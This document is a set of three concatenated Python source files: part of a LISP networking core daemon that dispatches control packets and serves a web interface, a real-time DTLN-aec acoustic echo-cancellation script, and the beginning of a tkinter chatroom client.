dd_prefix = geo_prefix.dms_to_decimal()
dd_prefix = (round(dd_prefix[0], 6), round(dd_prefix[1], 6))
distance = round(geo_prefix.get_distance(geo_point), 2)
inside = "inside" if geo_prefix.point_in_circle(geo_point) else \
"outside"
spo = lisp.space(2)
spe = lisp.space(1)
sd = lisp.space(3)
output = ("Geo-Point:{}{} {}{}<br>Geo-Prefix:{}{} {}, {} " + \
"kilometer radius{}<br>").format(spo, point_str, dd_point, eid,
spe, prefix_str, dd_prefix, km, eid_prefix)
output += "Distance:{}{} kilometers, point is {} of circle".format(sd,
distance, lisp.bold(inside, True))
#endif
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#enddef
#
# lisp_get_info_source
#
# See if this source has sent an Info-Request and we are caching it so we
# can proxy Map-Request for it. Either address OR nonce can be supplied to
# determine if we are doing a lookup based on address or nonce.
#
def lisp_get_info_source(addr_str, port, nonce):
if (addr_str != None):
for info_source in lisp.lisp_info_sources_by_address.values():
info_source_str = info_source.address.print_address_no_iid()
if (info_source_str == addr_str and info_source.port == port):
return(info_source)
#endif
#endfor
return(None)
#endif
if (nonce != None):
if (nonce not in lisp.lisp_info_sources_by_nonce): return(None)
return(lisp.lisp_info_sources_by_nonce[nonce])
#endif
return(None)
#enddef
#
# lisp_nat_proxy_map_request
#
# Grab the nonce from the Map-Request, store it in the info-source data
# structure and modify the ITR-RLOCs field so the Map-Reply comes back to us.
#
def lisp_nat_proxy_map_request(lisp_sockets, info_source, packet):
#
# Parse and move packet pointer to beginning of Map-Request.
#
ecm = lisp.lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lisp.lprint("Could not decode ECM packet")
return(True)
#endif
header = lisp.lisp_control_header()
if (header.decode(packet) == None):
lisp.lprint("Could not decode control header")
return(True)
#endif
if (header.type != lisp.LISP_MAP_REQUEST):
lisp.lprint("Received ECM without Map-Request inside")
return(True)
#endif
#
# We are at the Map-Request header.
#
map_request = lisp.lisp_map_request()
packet = map_request.decode(packet, None, 0)
nonce = map_request.nonce
addr_str = info_source.address.print_address_no_iid()
#
# Print Map-Request again to show what has changed.
#
map_request.print_map_request()
lisp.lprint("Process {} from info-source {}, port {}, nonce 0x{}". \
format(lisp.bold("nat-proxy Map-Request", False),
lisp.red(addr_str, False), info_source.port,
lisp.lisp_hex_string(nonce)))
#
# Store nonce in info-source and cache in dictionary array. We will need
# to find it based on nonce when the Map-Reply is returned to us.
#
info_source.cache_nonce_for_info_source(nonce)
#
# Do not timeout Map-Requests that are subscription-requests. Because a
# Map-Notify can be triggered any time back to the requester.
#
info_source.no_timeout = map_request.subscribe_bit
#
# Check if we are already in ITR-RLOCs list. If so, this could be looping.
# Return so the Map-Request can be processed in the regular fashion (that
# is, send on DDT or to a Map-Resolver.
#
for itr_rloc in map_request.itr_rlocs:
if (itr_rloc.is_local()): return(False)
#endfor
#
# Store new ITR-RLOCs list.
#
myself = lisp.lisp_myrlocs[0]
map_request.itr_rloc_count = 0
map_request.itr_rlocs = []
map_request.itr_rlocs.append(myself)
packet = map_request.encode(None, 0)
map_request.print_map_request()
deid = map_request.target_eid
if (deid.is_ipv6()):
myself_v6 = lisp.lisp_myrlocs[1]
if (myself_v6 != None): myself = myself_v6
#endif
#
# Send ECM based Map-Request to Map-Resolver.
#
ms = lisp.lisp_is_running("lisp-ms")
lisp.lisp_send_ecm(lisp_sockets, packet, deid, lisp.LISP_CTRL_PORT,
deid, myself, to_ms=ms, ddt=False)
return(True)
#enddef
#
# lisp_nat_proxy_reply
#
# Grab the nonce from the Map-Request, store it in the info-source data
# structure and modify the ITR-RLOCs field so the Map-Reply/Notify comes
# back to us.
#
def lisp_nat_proxy_reply(lisp_sockets, info_source, packet, mr_or_mn):
addr_str = info_source.address.print_address_no_iid()
port = info_source.port
nonce = info_source.nonce
mr_or_mn = "Reply" if mr_or_mn else "Notify"
mr_or_mn = lisp.bold("nat-proxy Map-{}".format(mr_or_mn), False)
lisp.lprint("Forward {} to info-source {}, port {}, nonce 0x{}".format( \
mr_or_mn, lisp.red(addr_str, False), port,
lisp.lisp_hex_string(nonce)))
#
# Send on socket with arguments passed from IPC message.
#
dest = lisp.lisp_convert_4to6(addr_str)
lisp.lisp_send(lisp_sockets, dest, port, packet)
#enddef
#
# lisp_core_dispatch_packet
#
# Look at packet type and decide which process to send it to.
#
def lisp_core_dispatch_packet(lisp_sockets, source, sport, packet):
global lisp_ipc_socket
header = lisp.lisp_control_header()
if (header.decode(packet) == None):
lisp.lprint("Could not decode control header")
return
#endif
#
# In the lispers.net implementation any LISP system can process Info-
# Requests. We'll have the lisp-core process do this. lig/rig and the
# lisp-etr process sends Info-Requests messages. Since the lisp-core
# process processes Info-Requests, it responds with Info-Reply messages.
# And they are sent to the emphemeral port so go straight back to the lig/
# rig, or etr-processes.
#
if (header.type == lisp.LISP_NAT_INFO):
if (header.info_reply == False):
lisp.lisp_process_info_request(lisp_sockets, packet, source, sport,
lisp.lisp_ms_rtr_list)
#endif
return
#endif
local_packet = packet
packet = lisp.lisp_packet_ipc(packet, source, sport)
#
# Map-Registers, Echos, and Map-Notify-Acks go to the lisp-ms process.
#
if (header.type in (lisp.LISP_MAP_REGISTER, lisp.LISP_MAP_NOTIFY_ACK)):
lisp.lisp_ipc(packet, lisp_ipc_socket, "lisp-ms")
return
#endif
#
# Map-Reply messages go to ITRs.
#
if (header.type == lisp.LISP_MAP_REPLY):
map_reply = lisp.lisp_map_reply()
map_reply.decode(local_packet)
info_source = lisp_get_info_source(None, 0, map_reply.nonce)
if (info_source):
lisp_nat_proxy_reply(lisp_sockets, info_source, local_packet, True)
else:
lig = "/tmp/lisp-lig"
if (os.path.exists(lig)):
lisp.lisp_ipc(packet, lisp_ipc_socket, lig)
else:
lisp.lisp_ipc(packet, lisp_ipc_socket, "lisp-itr")
#endif
#endif
return
#endif
#
# Map-Notify messages go to ITRs.
#
if (header.type == lisp.LISP_MAP_NOTIFY):
map_notify = lisp.lisp_map_notify(lisp_sockets)
map_notify.decode(local_packet)
info_source = lisp_get_info_source(None, 0, map_notify.nonce)
if (info_source):
lisp_nat_proxy_reply(lisp_sockets, info_source, local_packet,
False)
else:
lig = "/tmp/lisp-lig"
if (os.path.exists(lig)):
lisp.lisp_ipc(packet, lisp_ipc_socket, lig)
else:
process = "lisp-rtr" if lisp.lisp_is_running("lisp-rtr") else \
"lisp-etr"
lisp.lisp_ipc(packet, lisp_ipc_socket, process)
#endif
#endif
return
#endif
#
# Map-Referral messages go to MRs. But if a rig client is running on
# this machine, IPC it to the client.
#
if (header.type == lisp.LISP_MAP_REFERRAL):
rig = "/tmp/lisp-rig"
if (os.path.exists(rig)):
lisp.lisp_ipc(packet, lisp_ipc_socket, rig)
else:
lisp.lisp_ipc(packet, lisp_ipc_socket, "lisp-mr")
#endif
return
#endif
#
# Map-Requests go to ETRs/RTRs when they RLOC-probes or SMR-invoked
# requests. And Map-Requests go to ITRs when they are SMRs.
#
if (header.type == lisp.LISP_MAP_REQUEST):
process = "lisp-itr" if (header.is_smr()) else "lisp-etr"
#
# RLOC-probes are received specifically by the process by pcaping
# on port 4342.
#
if (header.rloc_probe): return
lisp.lisp_ipc(packet, lisp_ipc_socket, process)
return
#endif
#
# ECMs can go to a lot of places. They are sent ITR->MR, LIG->MR, MR->DDT,
# MR->MS, and MS->ETR. If we find an Info-Request source, this core
# process will process the Map-Request so it can get the Map-Reply and
# forward to the translated address and port of a client behind a NAT.
#
if (header.type == lisp.LISP_ECM):
info_source = lisp_get_info_source(source, sport, None)
if (info_source):
if (lisp_nat_proxy_map_request(lisp_sockets, info_source,
local_packet)): return
#endif
process = "lisp-mr"
if (header.is_to_etr()):
process = "lisp-etr"
elif (header.is_to_ms()):
process = "lisp-ms"
elif (header.is_ddt()):
if (lisp.lisp_is_running("lisp-ddt")):
process = "lisp-ddt"
elif (lisp.lisp_is_running("lisp-ms")):
process = "lisp-ms"
#endif
elif (lisp.lisp_is_running("lisp-mr") == False):
process = "lisp-etr"
#endif
lisp.lisp_ipc(packet, lisp_ipc_socket, process)
#endif
return
#enddef
#
# lisp_ssl_server
#
# Setup cherrypy server that supports SSL connections. This is so we can
# protect passwords that flow over an http connection.
#
# Used the following to create private key and cert:
#
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
#
class lisp_ssl_server(bottle.ServerAdapter):
def run(self, hand):
cert = "./lisp-cert.pem"
#
# Use user provided lisp-cert.pem if it exists. Otherwise use the
# lispers.net default lisp-cert.pem.default file.
#
if (os.path.exists(cert) == False):
os.system("cp ./lisp-cert.pem.default {}".format(cert))
lisp.lprint(("{} does not exist, creating a copy from lisp-" + \
"cert.pem.default").format(cert))
#endif
server = wsgiserver.CherryPyWSGIServer((self.host, self.port), hand)
server.ssl_adapter = pyOpenSSLAdapter(cert, cert, None)
# context = SSL.Context(SSL.SSLv23_METHOD)
# server.ssl_adapter.context = context
try:
server.start()
finally:
server.stop()
#endtry
#enddef
#endclass
#
# lisp_bottle_ipv4_process
#
# Variable bottle_port can take on the following values:
#
# 8080 - run web server on port 8080 using SSL
# 443 - run web server on port 443 using SSL
# -8080 - run web server on port 8080 with no SSL (no secure connection).
#
# Any other port is accepted and used with SSL. If a "-" precedes it, it is
# used with no SSL.
#
def lisp_bottle_ipv4_process(bottle_port):
lisp.lisp_set_exception()
#
# No security. Usually for testing purposes or complexities installing
# OpenSSL.
#
if (bottle_port < 0):
bottle.run(host="0.0.0.0", port=-bottle_port)
return
#endif
bottle.server_names["lisp-ssl-server"] = lisp_ssl_server
#
# If you want to run without SSL, do this and comment out the above call.
#
try:
bottle.run(host="0.0.0.0", port=bottle_port, server="lisp-ssl-server",
fast=True)
except:
bottle.run(host="0.0.0.0", port=bottle_port, fast=True)
#endtry
return
#enddef
#
# lisp_bottle_ipv6_process
#
# Start HTTP server on port 8080. But bottle does not support IPv6 yet so
# we comment out the call.
#
def lisp_bottle_ipv6_process():
lisp.lisp_set_exception()
# run(host="0::0", port=8080)
return
#enddef
#
# lisp_check_processes
#
# Check to see if any component has gone down when it should be running. And
# if it comes up when it should be running, download the configuration commands
# it is responsible for.
#
def lisp_check_processes(lisp_socket):
lisp.lisp_set_exception()
status = {"lisp-itr" : False, "lisp-etr" : False, "lisp-rtr" : False,
"lisp-mr" : False, "lisp-ms" : False, "lisp-ddt" : False}
while (True):
time.sleep(1)
old_status = status
status = {}
for process in old_status:
status[process] = lisp.lisp_is_running(process)
if (old_status[process] == status[process]): continue
lisp.lprint("*** Process '{}' has {} ***".format(process,
"come up" if status[process] else "gone down"))
#
# If process has come up, send configuration commands.
#
if (status[process] == True):
lisp.lisp_ipc_lock.acquire()
lispconfig.lisp_send_commands(lisp_socket, process)
lisp.lisp_ipc_lock.release()
#endif
#endfor
#endwhile
return
#enddef
#
# lisp_timeout_info_sources
#
# Timeout info sources from lisp_info_source_list{}.
#
def lisp_timeout_info_sources():
lisp.lisp_set_exception()
timeout = 60
while (True):
time.sleep(timeout)
delete_list = []
now = lisp.lisp_get_timestamp()
#
# Find entries that are greater than 1 minute old.
#
for key in lisp.lisp_info_sources_by_address:
info_source = lisp.lisp_info_sources_by_address[key]
if (info_source.no_timeout): continue
if (info_source.uptime + timeout < now): continue
delete_list.append(key)
nonce = info_source.nonce
if (nonce == None): continue
if (nonce in lisp.lisp_info_sources_by_nonce):
lisp.lisp_info_sources_by_nonce.pop(nonce)
#endif
#endfor
#
# Go through delete list to remove from dictionary array.
#
for key in delete_list:
lisp.lisp_info_sources_by_address.pop(key)
#endfor
#endwhile
return
#enddef
#
# lisp_core_control_packet_process
#
# Listen for IPC messages from LISP componment processes. They want to send
# control packets out on the network from UDP port 4342.
#
def lisp_core_control_packet_process(lisp_ipc_control_socket, lisp_sockets):
lisp.lisp_set_exception()
while (True):
try: packet_data = lisp_ipc_control_socket.recvfrom(9000)
except: return(["", "", "", ""])
data = packet_data[0].split("@")
source = packet_data[1]
opcode = data[0]
dest = data[1]
port = int(data[2])
packet = data[3::]
if (len(packet) > 1):
packet = lisp.lisp_bit_stuff(packet)
else:
packet = packet[0]
#endif
if (opcode != "control-packet"):
lisp.lprint(("lisp_core_control_packet_process() received" + \
"unexpected control-packet, message ignored"))
continue
#endif
lisp.lprint(("{} {} bytes from {}, dest/port: {}/{}, control-" + \
"packet: {}").format(lisp.bold("Receive", False), len(packet),
source, dest, port, lisp.lisp_format_packet(packet)))
#
# Check if this is a Map-Reply to a ephem port and we have an
# Info-Source for the nonce in the Map-Reply. If so, call
# lisp_core_dispatch_packet().
#
header = lisp.lisp_control_header()
header.decode(packet)
if (header.type == lisp.LISP_MAP_REPLY):
map_reply = lisp.lisp_map_reply()
map_reply.decode(packet)
if (lisp_get_info_source(None, 0, map_reply.nonce)):
lisp_core_dispatch_packet(lisp_sockets, source, port, packet)
continue
#endif
#endif
#
# This is a Map-Notify that the lisp-etr process received and it
# has determined it is a (S,G) multicast Map-Notify that the lisp-itr
# process needs to process to update its map-cache.
#
if (header.type == lisp.LISP_MAP_NOTIFY and source == "lisp-etr"):
ipc = lisp.lisp_packet_ipc(packet, source, port)
lisp.lisp_ipc(ipc, lisp_ipc_socket, "lisp-itr")
continue
#endif
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
addr = lisp.lisp_convert_4to6(dest)
addr = lisp.lisp_address(lisp.LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(dest)): dest = "::ffff:" + dest
addr.store_address(dest)
#
# Send on socket with arguments passed from IPC message.
#
lisp.lisp_send(lisp_sockets, addr, port, packet)
#endwhile
return
#enddef
#
# lisp_cp_lisp_config
#
# The file ./lisp.config does not exist. Copy all commands from file
# lisp.config.example up to the dashed line.
#
def lisp_core_cp_lisp_config():
f = open("./lisp.config.example", "r"); lines = f.read(); f.close()
f = open("./lisp.config", "w")
lines = lines.split("\n")
for line in lines:
f.write(line + "\n")
if (line[0] == "#" and line[-1] == "#" and len(line) >= 4):
dashes = line[1:-2]
dash_check = len(dashes) * "-"
if (dashes == dash_check): break
#endif
#endfor
f.close()
return
#enddef
#
# lisp_core_startup
#
# Intialize this LISP core process. This function returns a LISP network
# listen socket.
#
def lisp_core_startup(bottle_port):
global lisp_build_date
global lisp_control_listen_socket
global lisp_ipc_socket
global lisp_ipc_control_socket
global lisp_sockets
global lisp_encap_socket
lisp.lisp_i_am("core")
lisp.lisp_set_exception()
lisp.lisp_print_banner("core-process starting up")
lisp.lisp_uptime = lisp.lisp_get_timestamp()
lisp.lisp_version = commands.getoutput("cat lisp-version.txt")
lisp_build_date = commands.getoutput("cat lisp-build-date.txt")
#
# Get local address for source RLOC for encapsulation.
#
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Only the core process uses a lock so it can send commands and show
# output in parallel to the component processes.
#
lisp.lisp_ipc_lock = multiprocessing.Lock()
#
# If this is a development build, put a plus after the version number.
# A development build is a build done from a directory that has the
# lisp.py file. Released builds built from the build directory will build
# only .pyo files.
#
if (os.path.exists("lisp.py")): lisp.lisp_version += "+"
#
# Open network socket to listen (and send) on port 4342. We may want
# a Map-Resolver to respond with a source-address of an anycast address
# so firewalls and NAT can return responses to ITRs or lig/rig clients.
#
address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
if (os.getenv("LISP_ANYCAST_MR") == None or lisp.lisp_myrlocs[0] == None):
lisp_control_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp.LISP_CTRL_PORT))
else:
address = lisp.lisp_myrlocs[0].print_address_no_iid()
lisp_control_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp.LISP_CTRL_PORT))
#endif
lisp.lprint("Listen on {}, port 4342".format(address))
#
# Open datagram socket for 4341. We will not listen on it. We just don't
# want the kernel to send port unreachables to ITRs and PITRs. If another
# data-plane is running, it may listen on the data port 4341. Let it.
#
if (lisp.lisp_external_data_plane() == False):
lisp_encap_socket = lisp.lisp_open_listen_socket(address,
str(lisp.LISP_DATA_PORT))
lisp.lprint("Listen on {}, port 4341".format(address))
#endif
#
# Open internal socket to send from to LISP components for configuration
# events.
#
lisp_ipc_socket = lisp.lisp_open_send_socket("lisp-core", "")
lisp_ipc_socket.settimeout(3)
#
# Open internal socket 'lisp-core-pkt' so LISP components can send
# control packets from UDP port 4342 via this lisp-core process.
#
lisp_ipc_control_socket = lisp.lisp_open_listen_socket("", "lisp-core-pkt")
lisp_sockets = [lisp_control_listen_socket, lisp_control_listen_socket,
lisp_ipc_socket]
#
# Start a thread to listen for control packet from LISP component
# processes.
#
threading.Thread(target=lisp_core_control_packet_process,
args=[lisp_ipc_control_socket, lisp_sockets]).start()
#
# Start a new thread to monitor configuration file changes. Do quick check
# to see if this is a first-time startup for the system. Check to see if
# lisp.config was not created by user.
#
if (os.path.exists("./lisp.config") == False):
lisp.lprint(("./lisp.config does not exist, creating a copy " + \
"from lisp.config.example"))
lisp_core_cp_lisp_config()
#endif
#
# Check if we are a map-server listening on a multicast group. This
# is a decentralized-xtr with a multicast map-server address.
#
lisp_check_decent_xtr_multicast(lisp_control_listen_socket)
threading.Thread(target=lispconfig.lisp_config_process,
args=[lisp_ipc_socket]).start()
#
# Start a new thread to run bottle for each address-family.
#
threading.Thread(target=lisp_bottle_ipv4_process,
args=[bottle_port]).start()
threading.Thread(target=lisp_bottle_ipv6_process, args=[]).start()
#
# Start a new thread to run LISP component health check.
#
threading.Thread(target=lisp_check_processes,
args=[lisp_ipc_socket]).start()
#
# Start a new thread to run LISP component health check.
#
threading.Thread(target=lisp_timeout_info_sources).start()
return(True)
#enddef
#
# lisp_core_shutdown
#
# Shutdown process.
#
def lisp_core_shutdown():
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_ipc_socket, "lisp-core")
lisp.lisp_close_socket(lisp_ipc_control_socket, "lisp-core-pkt")
lisp.lisp_close_socket(lisp_control_listen_socket, "")
lisp.lisp_close_socket(lisp_encap_socket, "")
return
#enddef
#
# lisp_check_decent_xtr_multicast
#
# Check to see if "decentralized-xtr = yes" and if any map-server clause has
# a multicast address configured. If so, setsockopt so we can receive
# multicast Map-Register messages.
#
# This function is robust enough for when a user copies lisp.config.example
# into lisp.config. We have to ignore text after "#- ... -#".
#
def lisp_check_decent_xtr_multicast(lisp_socket):
f = open("./lisp.config", "r"); lines = f.read(); f.close()
lines = lines.split("\n")
#
# Check if "decentralized-xtr = yes" is in the "lisp xtr-parameters"
# command clause.
#
decent_xtr = False
for line in lines:
if (line[0:1] == "#-" and line[-2:-1] == "-#"): break
if (line == "" or line[0] == "#"): continue
if (line.find("decentralized-xtr = yes") == -1): continue
decent_xtr = True
break
#endfor
if (decent_xtr == False): return
#
# Check if "lisp map-server" command clauses have multicast addresses
# configured.
#
groups = []
in_clause = False
for line in lines:
if (line[0:1] == "#-" and line[-2:-1] == "-#"): break
if (line == "" or line[0] == "#"): continue
if (line.find("lisp map-server") != -1):
in_clause = True
continue
#endif
if (line[0] == "}"):
in_clause = False
continue
#endif
#
# Parse address. Look at high-order byte.
#
if (in_clause and line.find("address = ") != -1):
group = line.split("address = ")[1]
ho_byte = int(group.split(".")[0])
if (ho_byte >= 224 and ho_byte < 240): groups.append(group)
#endif
#endfor
if (group == []): return
#
# Find eth0 IP address.
#
out = commands.getoutput('ifconfig eth0 | egrep "inet "')
if (out == ""): return
intf_addr = out.split()[1]
#
# Set socket options on socket.
#
i = socket.inet_aton(intf_addr)
for group in groups:
lisp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
lisp_socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, i)
g = socket.inet_aton(group) + i
lisp_socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, g)
lisp.lprint("Setting multicast listen socket for group {}".format( \
group))
#endfor
return
#enddef
#------------------------------------------------------------------------------
bottle_port = int(sys.argv[1]) if (len(sys.argv) > 1) else 8080
#
# Main entry point for process.
#
if (lisp_core_startup(bottle_port) == False):
lisp.lprint("lisp_core_startup() failed")
lisp.lisp_print_banner("lisp-core abnormal exit")
exit(1)
#endif
while (True):
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket..
#
opcode, source, port, packet = \
lisp.lisp_receive(lisp_control_listen_socket, False)
if (source == ""): break
#
# Process received network packet.
#
source = lisp.lisp_convert_6to4(source)
lisp_core_dispatch_packet(lisp_sockets, source, port, packet)
#endwhile
lisp_core_shutdown()
lisp.lisp_print_banner("lisp-core normal exit")
exit(0)
#------------------------------------------------------------------------------
|
aec_mp.py | # -*- coding: utf-8 -*-
"""
Script to process realtime audio with a trained DTLN-aec model.
This script directly interacts with audio devices. It expects 16kHz audio input/output.
Input device should contain a loopback channel as its last channel, and it assume raw mic input is in the first channel.
Example call:
$python rt_dtln_aec_mp.py -i capture -o playback -m /name/of/the/model
Author: sanebow (sanebow@gmail.com)
Version: 23.05.2021
This code is licensed under the terms of the MIT-license.
"""
import soundfile as sf
import sounddevice as sd
import numpy as np
import time
import argparse
import tflite_runtime.interpreter as tflite
from multiprocessing import Process, Queue
import threading
import collections
import daemon
import sys
try:
from multiprocessing import shared_memory
except ImportError:
try:
import shared_memory
except ImportError:
print("[ERROR] please install shared-memory38 on Python < 3.8")
exit(1)
g_use_fftw = True
try:
import pyfftw
except ImportError:
print("[WARNING] pyfftw is not installed, use np.fft")
g_use_fftw = False
def int_or_str(text):
"""Helper function for argument parsing."""
try:
return int(text)
except ValueError:
return text
def fetch_shm_ndarray(name, shape, dtype='float32', init=False):
buf = np.zeros(shape).astype(dtype)
if init:
shm = shared_memory.SharedMemory(name=name, create=True, size=buf.nbytes)
else:
shm = shared_memory.SharedMemory(name=name)
arr = np.ndarray(buf.shape, dtype=buf.dtype, buffer=shm.buf)
if init:
arr[:] = buf[:]
return arr, shm
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-l', '--list-devices', action='store_true',
help='show list of audio devices and exit')
args, remaining = parser.parse_known_args()
if args.list_devices:
print(sd.query_devices())
parser.exit(0)
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter,
parents=[parser])
parser.add_argument("--input_device", "-i", type=int_or_str, help="input device (numeric ID or substring)")
parser.add_argument("--output_device", "-o", type=int_or_str, help="output device (numeric ID or substring)")
parser.add_argument("--model", "-m", choices=['128', '256', '512'], default='256', help="number of LSTM units for tf-lite model (one of 128, 256, 512)")
parser.add_argument("--channels", "-c", type=int, default=2, help="number of input channels")
parser.add_argument('--no-aec', '-n', action='store_true', help='turn off AEC, pass-through')
parser.add_argument("--latency", type=float, default=0.2, help="latency of sound device")
parser.add_argument("--threads", type=int, default=1, help="set thread number for interpreters")
parser.add_argument('--measure', action='store_true', help='measure and report processing time')
parser.add_argument('--no-fftw', action='store_true', help='use np.fft instead of fftw')
parser.add_argument('--save', '-s', action='store_true', help='save input and output audio files (wav)')
parser.add_argument('-D', '--daemonize', action='store_true',help='run as a daemon')
args = parser.parse_args(remaining)
# set block len and block shift
block_len = 512
block_shift = 128
interpreter_1 = tflite.Interpreter(
model_path="models/dtln_aec_{}_quant_1.tflite".format(args.model), num_threads=args.threads)
interpreter_1.allocate_tensors()
input_details_1 = interpreter_1.get_input_details()
in_idx = next(i for i in input_details_1 if i["name"] == "input_3")["index"]
lpb_idx = next(i for i in input_details_1 if i["name"] == "input_4")["index"]
states_idx = next(i for i in input_details_1 if i["name"] == "input_5")["index"]
output_details_1 = interpreter_1.get_output_details()
states_1 = np.zeros(input_details_1[states_idx]["shape"]).astype("float32")
interpreter_2 = tflite.Interpreter(
model_path="models/dtln_aec_{}_quant_2.tflite".format(args.model), num_threads=args.threads)
interpreter_2.allocate_tensors()
in_buffer = np.zeros((block_len)).astype("float32")
in_buffer_lpb = np.zeros((block_len)).astype("float32")
out_buffer = np.zeros((block_len)).astype('float32')
in_lpb, _shm1 = fetch_shm_ndarray('in_lpb', (1, 1, block_len), init=True)
est_block, _shm2 = fetch_shm_ndarray('est_block', (1, 1, block_len), init=True)
out_block, _shm3 = fetch_shm_ndarray('out_block', (block_len), init=True)
shms = [_shm1, _shm2, _shm3]
q = Queue(maxsize=1)
if g_use_fftw:
fft_buf = pyfftw.empty_aligned(512, dtype='float32')
rfft = pyfftw.builders.rfft(fft_buf)
ifft_buf = pyfftw.empty_aligned(257, dtype='complex64')
irfft = pyfftw.builders.irfft(ifft_buf)
if args.save:
in_wav = sf.SoundFile('/tmp/aec_in.wav', 'w', 16000, 2)
out_wav = sf.SoundFile('/tmp/aec_out.wav', 'w', 16000, 1)
t_ring = collections.deque(maxlen=512)
# =========== stage 1 =============
def callback(indata, outdata, frames, buftime, status):
global in_buffer, out_buffer, in_buffer_lpb, states_1, g_use_fftw
if args.measure:
start_time = time.time()
if status:
print(status)
if args.no_aec:
# time.sleep(max(0, np.random.normal(loc=6.0, scale=1.0)*1e-3))
outdata[:, 0] = indata[:, 0]
if args.measure:
t_ring.append(time.time() - start_time)
return
# write mic stream to buffer
in_buffer[:-block_shift] = in_buffer[block_shift:]
in_buffer[-block_shift:] = np.squeeze(indata[:, 0])
# write playback stream to buffer
in_buffer_lpb[:-block_shift] = in_buffer_lpb[block_shift:]
in_buffer_lpb[-block_shift:] = np.squeeze(indata[:, -1])
# calculate fft of input block
if g_use_fftw:
fft_buf[:] = in_buffer
in_block_fft = rfft().astype("complex64")
else:
in_block_fft = np.fft.rfft(in_buffer).astype("complex64")
# create magnitude
in_mag = np.abs(in_block_fft)
in_mag = np.reshape(in_mag, (1, 1, -1)).astype("float32")
# calculate log pow of lpb
if g_use_fftw:
fft_buf[:] = in_buffer_lpb
lpb_block_fft = rfft().astype("complex64")
else:
lpb_block_fft = np.fft.rfft(in_buffer_lpb).astype("complex64")
lpb_mag = np.abs(lpb_block_fft)
lpb_mag = np.reshape(lpb_mag, (1, 1, -1)).astype("float32")
# set tensors to the first model
interpreter_1.set_tensor(input_details_1[in_idx]["index"], in_mag)
interpreter_1.set_tensor(input_details_1[lpb_idx]["index"], lpb_mag)
interpreter_1.set_tensor(input_details_1[states_idx]["index"], states_1)
# run calculation
interpreter_1.invoke()
# # get the output of the first block
out_mask = interpreter_1.get_tensor(output_details_1[0]["index"])
states_1 = interpreter_1.get_tensor(output_details_1[1]["index"])
# apply mask and calculate the ifft
if g_use_fftw:
ifft_buf[:] = in_block_fft * out_mask
estimated_block = irfft()
else:
estimated_block = np.fft.irfft(in_block_fft * out_mask)
# reshape the time domain frames
in_lpb[:] = np.reshape(in_buffer_lpb, (1, 1, -1)).astype("float32")
est_block[:] = np.reshape(estimated_block, (1, 1, -1)).astype("float32")
q.get() # get stage2 output
# shift values and write to buffer
# write to buffer
out_buffer[:-block_shift] = out_buffer[block_shift:]
out_buffer[-block_shift:] = np.zeros((block_shift))
out_buffer += np.squeeze(out_block)
# output to soundcard
outdata[:] = np.expand_dims(out_buffer[:block_shift], axis=-1)
if args.measure:
dt = time.time() - start_time
t_ring.append(dt)
if dt > 8e-3:
print("[warning] process time: {:.2f} ms".format(dt * 1000))
if args.save:
in_wav.write(indata)
out_wav.write(outdata)
def stage2(interpreter_2, q):
input_details_2 = interpreter_2.get_input_details()
est_idx = next(i for i in input_details_2 if i["name"] == "input_6")["index"]
lpb_idx = next(i for i in input_details_2 if i["name"] == "input_7")["index"]
states_idx = next(i for i in input_details_2 if i["name"] == "input_8")["index"]
output_details_2 = interpreter_2.get_output_details()
states_2 = np.zeros(input_details_2[states_idx]["shape"]).astype("float32")
block_len = 512
in_lpb, _shm1 = fetch_shm_ndarray('in_lpb', (1, 1, block_len))
est_block, _shm2 = fetch_shm_ndarray('est_block', (1, 1, block_len))
out_block, _shm3 = fetch_shm_ndarray('out_block', (block_len))
q.put(0) # tell another process am ready
q.put(0) # let stage1 go first
while True:
# set tensors to the second block
interpreter_2.set_tensor(input_details_2[lpb_idx]["index"], in_lpb)
interpreter_2.set_tensor(input_details_2[est_idx]["index"], est_block)
interpreter_2.set_tensor(input_details_2[states_idx]["index"], states_2)
# run calculation
interpreter_2.invoke()
# get output tensors
out_block[:] = interpreter_2.get_tensor(output_details_2[0]["index"])
states_2 = interpreter_2.get_tensor(output_details_2[1]["index"])
q.put(1) # output ready
def open_stream():
with sd.Stream(device=(args.input_device, args.output_device),
samplerate=16000, blocksize=block_shift,
dtype=np.float32, latency=args.latency,
channels=(args.channels, 1), callback=callback):
print('#' * 80)
print('Ctrl-C to exit')
print('#' * 80)
if args.measure:
while True:
time.sleep(1)
print('Processing time: {:.2f} ms, std={:.2f}'.format(
1000 * np.average(t_ring), 1000 * np.std(t_ring)
), end='\r')
else:
threading.Event().wait()
try:
p2 = Process(target=stage2, args=(interpreter_2, q))
p2.start()
q.get() # wait till stage2 process ready
if args.daemonize:
with daemon.DaemonContext():
open_stream()
else:
open_stream()
except KeyboardInterrupt:
print("Keyboard interrupt, terminating ...")
except Exception as e:
raise
finally:
for shm in shms:
shm.close()
shm.unlink()
p2.terminate()
p2.join()
if args.save:
in_wav.flush()
in_wav.close()
out_wav.flush()
out_wav.close() |
chatroom.py | ################################################################################
## author: Lucas santos
## version: 1.0
## Python 3.6.5 | UTF-8
from tkinter import *
import socket
from threading import Thread
from random import randint
from time import sleep
################################################################################
# Global variables
nickname = 'User' + str(randint(10000, 99999))
################################################################################
class Login(LabelFrame):
def __init__(self, master, appName):
super().__init__(master)
# Tk configuration
self.master = master
self.master.geometry('500x400')
self.master.resizable(height=False, width=False)
self.master['bg'] = '#252525'
# LabelFrame configuration
self.appName = appName
self.config(text=self.appName, width=450, height=370,
padx=15, pady=15)
self.pack_propagate(False)
self['fg'] = '#999999'
